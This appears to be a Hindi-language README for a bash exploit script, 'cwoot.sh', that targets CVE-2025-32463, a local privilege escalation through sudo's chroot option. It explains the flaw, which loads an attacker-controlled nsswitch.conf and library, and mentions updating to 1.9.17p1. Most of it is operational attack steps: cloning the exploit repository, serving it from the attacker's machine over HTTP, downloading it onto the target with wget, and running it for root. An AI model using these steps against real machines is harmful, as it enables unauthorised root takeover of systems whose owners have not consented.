
# CVE-2025-32463 के लिए Bash शोषण स्क्रिप्ट Sudo 1.9.17 में chroot विकल्प के माध्यम से स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता, जो प्रभावित सिस्टम पर रूट एक्सेस सक्षम करती है।
Sudo संस्करण 1.9.17 में एक गंभीर कमजोरी (CVE-2025-32463) है जो स्थानीय उपयोगकर्ताओं को chroot विकल्प का शोषण करके रूट एक्सेस प्राप्त करने की अनुमति देती है, जिससे गंभीर सुरक्षा जोखिम पैदा हो सकते हैं। उपयोगकर्ताओं को सलाह दी जाती है कि वे इस समस्या को कम करने के लिए संस्करण 1.9.17p1 या उसके बाद के संस्करण में अपडेट करें।
Sudo 1.9.17 कमजोरी का अवलोकन:-
Sudo संस्करण 1.9.17 में कमजोरी, जिसे CVE-2025-32463 के रूप में पहचाना गया है, एक गंभीर दोष है जो स्थानीय उपयोगकर्ताओं को रूट एक्सेस प्राप्त करने की अनुमति देता है। यह समस्या इस बदलाव के कारण उत्पन्न होती है कि Sudo --chroot (-R) विकल्प को कैसे संभालता है, जो प्रक्रियाओं की रूट डायरेक्टरी बदलकर उन्हें अलग करने के लिए अभिप्रेत है।
कमजोरी कैसे काम करती है:-
पथ समाधान समस्या: संस्करण 1.9.14 से 1.9.17 में, Sudo उपयोगकर्ता अनुमतियों की जाँच करने से पहले --chroot विकल्प का मूल्यांकन करता है। यह हमलावरों को पर्यावरण को नियंत्रित करने और दुर्भावनापूर्ण लाइब्रेरी लोड करने की अनुमति देता है।
शोषण के चरण:
एक हमलावर अपने नियंत्रण वाली डायरेक्टरी में एक दुर्भावनापूर्ण nsswitch.conf फ़ाइल बनाता है। वे -R विकल्प के साथ Sudo निष्पादित करते हैं, जिससे Sudo हमलावर का कॉन्फ़िगरेशन और लाइब्रेरी लोड करता है, और रूट एक्सेस प्रदान करता है।
मैंने "cwoot.sh" नामक एक bash स्क्रिप्ट बनाई है जो निष्पादन के बाद सीधे रूट उपयोगकर्ता में बदल जाएगी।
निम्नलिखित करें:
स्क्रिप्ट को रिपॉजिटरी से डाउनलोड करें: git clone https://github.com/justjoeyking/CVE-2025-32463.git
अपनी मशीन में : python3 -m http.server 8080
लक्ष्य मशीन में : wget http://<own_IP_address>:8080/cwoot.sh
लक्ष्य मशीन में : chmod 755 cwoot.sh
लक्ष्य मशीन में स्क्रिप्ट चलाएँ : ./cwoot.sh